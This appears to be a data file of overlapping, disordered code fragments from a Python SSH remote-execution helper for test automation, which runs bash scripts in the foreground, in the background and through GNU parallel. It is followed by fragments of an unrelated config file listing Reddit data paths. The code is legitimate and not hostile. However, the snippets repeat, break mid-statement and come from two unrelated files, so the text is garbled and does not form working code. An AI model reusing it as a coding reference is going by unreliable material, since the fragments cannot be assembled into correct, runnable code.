"pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except",
"<< 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd,",
"background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename =",
"output_timeout): output_array = [] try: while True: segment = stdout.read().decode('utf-8') if segment ==",
"self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return",
"status) completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command))",
"scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return",
"ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60):",
"self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir",
"self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command",
"subprocess from subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client",
"__init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 *",
"with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return",
"tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename = random_base + \".out\" err_filename",
"import subprocess from subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client =",
"\"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 *",
"chan.close() def _read_output(self, stdout, output_timeout): output_array = [] try: while True: segment =",
"= chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self,",
"%s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60):",
"\"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except",
"= self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout",
"of '%s'. Partial output was\\n:%s\" % ( output_timeout, output)) e.output = output raise",
"= stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output stdout.close()",
"max_jobs = max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo",
"= subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command:",
"os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir,",
"max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename",
"completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH",
"def _exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status =",
"self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command",
"pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs",
"def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename =",
"% dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts,",
"pid_filename = random_base + \".pid\" out_filename = random_base + \".out\" err_filename = random_base",
"[\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i),",
"err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0",
"%(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout:",
"command): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if",
"if status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base",
"self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout)",
"= random_base + \".pid\" out_filename = random_base + \".out\" err_filename = random_base +",
"60): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb',",
"dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in",
"'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 *",
"background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir,",
"enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs,",
"2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"])",
"1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename),",
"%s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception",
"2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh",
"parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename)) command",
"joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix),",
"parallel import tempfile import os import subprocess from subprocess import CalledProcessError class Run(object):",
"'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename,",
"\"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename,",
"completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array = [] try: while True:",
"+ \".out\" err_filename = random_base + \".err\" status_filename = random_base + \".retcode\" command",
"stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e",
"try: while True: segment = stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except",
"self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout =",
"= stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array)",
"+ \".err\" status_filename = random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh <<",
"if segment == \"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e =",
"e.args += ('When running bash script \"%s\"' % command), raise def background_parallel(self, scripts,",
"base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" %",
"self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan =",
"import os import subprocess from subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client):",
"$?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError",
"= output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if",
"os import subprocess from subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client",
"+ \".pid\" out_filename = random_base + \".out\" err_filename = random_base + \".err\" status_filename",
"script \"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename",
"{completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout,",
"command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command}",
"\"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\"",
"% dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as",
"completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array =",
"\"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd =",
"automation_infra.plugins import background, parallel import tempfile import os import subprocess from subprocess import",
"err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands =",
"$!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except",
"dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout}",
"= [] try: while True: segment = stdout.read().decode('utf-8') if segment == \"\": break",
"break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout executing, no",
"bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command,",
"status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return",
"dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir,",
"background, parallel import tempfile import os import subprocess from subprocess import CalledProcessError class",
"return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array = [] try: while",
"no input for timeout of '%s'. Partial output was\\n:%s\" % ( output_timeout, output))",
"= [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir,",
"$?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i,",
"1>%s 2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup",
"\".pid\" out_filename = random_base + \".out\" err_filename = random_base + \".err\" status_filename =",
"script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i),",
"output raise e return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan =",
"= os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd =",
"def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir,",
"command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s&",
"Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script,",
"{completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def",
"Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename,",
"= transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1)",
"as e: raise Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self,",
"&\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename),",
"socket import logging from automation_infra.plugins import background, parallel import tempfile import os import",
"= chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error =",
"out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd",
"\"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout executing,",
"\"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError",
"self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e:",
"output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\",",
"\".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s",
"\"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s",
"transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr",
"-1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status()",
"<reponame>AnyVisionltd/automation-infra<filename>automation_infra/plugins/run.py import socket import logging from automation_infra.plugins import background, parallel import tempfile import",
"chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb',",
"'%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename)",
"socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout executing, no input for timeout",
"base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed running '%s',",
"raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout):",
"except socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout executing, no input for",
"parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try:",
"return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e: raise",
"execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command)",
"output = \"\".join(output_array) e = socket.timeout( \"Timeout executing, no input for timeout of",
"-1) stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process",
"random_base + \".out\" err_filename = random_base + \".err\" status_filename = random_base + \".retcode\"",
"\"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo",
"pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed running '%s', status",
"stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout)",
"completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array = []",
"bash script \"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/')",
"chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1)",
"timeout of '%s'. Partial output was\\n:%s\" % ( output_timeout, output)) e.output = output",
"ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout",
"= random_base + \".err\" status_filename = random_base + \".retcode\" command = \"\\n\".join([ \"nohup",
"except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" % (scripts, e.returncode))",
"chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script):",
"\"\".join(output_array) e = socket.timeout( \"Timeout executing, no input for timeout of '%s'. Partial",
"status != 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}')",
"e: raise Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script,",
"def execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan = transport.open_session() try:",
"max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" %",
"$!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command)",
"\"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename =",
"parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts,",
"60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"])",
"bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename,",
"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\"",
"&\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh <<",
"output)) e.output = output raise e return \"\".join(output_array) def _exec(self, command): transport =",
"e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs,",
"\"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport()",
"try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr =",
"bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise",
"in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" %",
"def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands =",
"command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self,",
"command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/')",
"socket.timeout( \"Timeout executing, no input for timeout of '%s'. Partial output was\\n:%s\" %",
"scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs)",
"def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20",
"'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60): transport",
"% (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir,",
"base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as e:",
"\"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\")",
"return parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args += ('When running bash",
"errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process",
"output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr =",
"script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 *",
"return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"):",
"\\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close()",
"bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename = random_base"
] |
[
"= \"./intermediate_data/network_matrices/\" ID_DICT_PATH = \"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\" COUNT_COL_NAME = \"f0_\" MIN_COUNT_BOT_EXCLUSION =",
"\"./intermediate_data/network_matrices/\" ID_DICT_PATH = \"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\" COUNT_COL_NAME = \"f0_\" MIN_COUNT_BOT_EXCLUSION = 500",
"DATA_PATH = \"/media/jonas/Extreme SSD/research/polarisation/data/2019_12/\" ADJACENCY_MATRIX_PATH = \"./intermediate_data/network_matrices/\" ID_DICT_PATH = \"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\"",
"\"/media/jonas/Extreme SSD/research/polarisation/data/2019_12/\" ADJACENCY_MATRIX_PATH = \"./intermediate_data/network_matrices/\" ID_DICT_PATH = \"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\" COUNT_COL_NAME =",
"ID_DICT_PATH = \"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\" COUNT_COL_NAME = \"f0_\" MIN_COUNT_BOT_EXCLUSION = 500 SUBREDDIT_COMMENT_THRESHOLD",
"ADJACENCY_MATRIX_PATH = \"./intermediate_data/network_matrices/\" ID_DICT_PATH = \"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\" COUNT_COL_NAME = \"f0_\" MIN_COUNT_BOT_EXCLUSION",
"\"f0_\" MIN_COUNT_BOT_EXCLUSION = 500 SUBREDDIT_COMMENT_THRESHOLD = 500 REBUILD = False SAVE = True",
"= \"/media/jonas/Extreme SSD/research/polarisation/data/2019_12/\" ADJACENCY_MATRIX_PATH = \"./intermediate_data/network_matrices/\" ID_DICT_PATH = \"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\" COUNT_COL_NAME",
"\"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\" COUNT_COL_NAME = \"f0_\" MIN_COUNT_BOT_EXCLUSION = 500 SUBREDDIT_COMMENT_THRESHOLD = 500",
"EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\" COUNT_COL_NAME = \"f0_\" MIN_COUNT_BOT_EXCLUSION = 500 SUBREDDIT_COMMENT_THRESHOLD = 500 REBUILD",
"COUNT_COL_NAME = \"f0_\" MIN_COUNT_BOT_EXCLUSION = 500 SUBREDDIT_COMMENT_THRESHOLD = 500 REBUILD = False SAVE",
"SUBREDDIT_COMMENT_THRESHOLD = 500 REBUILD = False SAVE = True SAMPLE_DF = False MONTH",
"\"./intermediate_data/edge_lists/\" COUNT_COL_NAME = \"f0_\" MIN_COUNT_BOT_EXCLUSION = 500 SUBREDDIT_COMMENT_THRESHOLD = 500 REBUILD = False",
"SSD/research/polarisation/data/2019_12/\" ADJACENCY_MATRIX_PATH = \"./intermediate_data/network_matrices/\" ID_DICT_PATH = \"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\" COUNT_COL_NAME = \"f0_\"",
"MIN_COUNT_BOT_EXCLUSION = 500 SUBREDDIT_COMMENT_THRESHOLD = 500 REBUILD = False SAVE = True SAMPLE_DF",
"<filename>config.py DATA_PATH = \"/media/jonas/Extreme SSD/research/polarisation/data/2019_12/\" ADJACENCY_MATRIX_PATH = \"./intermediate_data/network_matrices/\" ID_DICT_PATH = \"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH =",
"500 REBUILD = False SAVE = True SAMPLE_DF = False MONTH = \"2019_12\"",
"= 500 REBUILD = False SAVE = True SAMPLE_DF = False MONTH =",
"= 500 SUBREDDIT_COMMENT_THRESHOLD = 500 REBUILD = False SAVE = True SAMPLE_DF =",
"= \"f0_\" MIN_COUNT_BOT_EXCLUSION = 500 SUBREDDIT_COMMENT_THRESHOLD = 500 REBUILD = False SAVE =",
"500 SUBREDDIT_COMMENT_THRESHOLD = 500 REBUILD = False SAVE = True SAMPLE_DF = False",
"= \"./intermediate_data/edge_lists/\" COUNT_COL_NAME = \"f0_\" MIN_COUNT_BOT_EXCLUSION = 500 SUBREDDIT_COMMENT_THRESHOLD = 500 REBUILD =",
"= \"./intermediate_data/id_to_sub_dicts/\" EDGE_LIST_PATH = \"./intermediate_data/edge_lists/\" COUNT_COL_NAME = \"f0_\" MIN_COUNT_BOT_EXCLUSION = 500 SUBREDDIT_COMMENT_THRESHOLD ="
] |
[
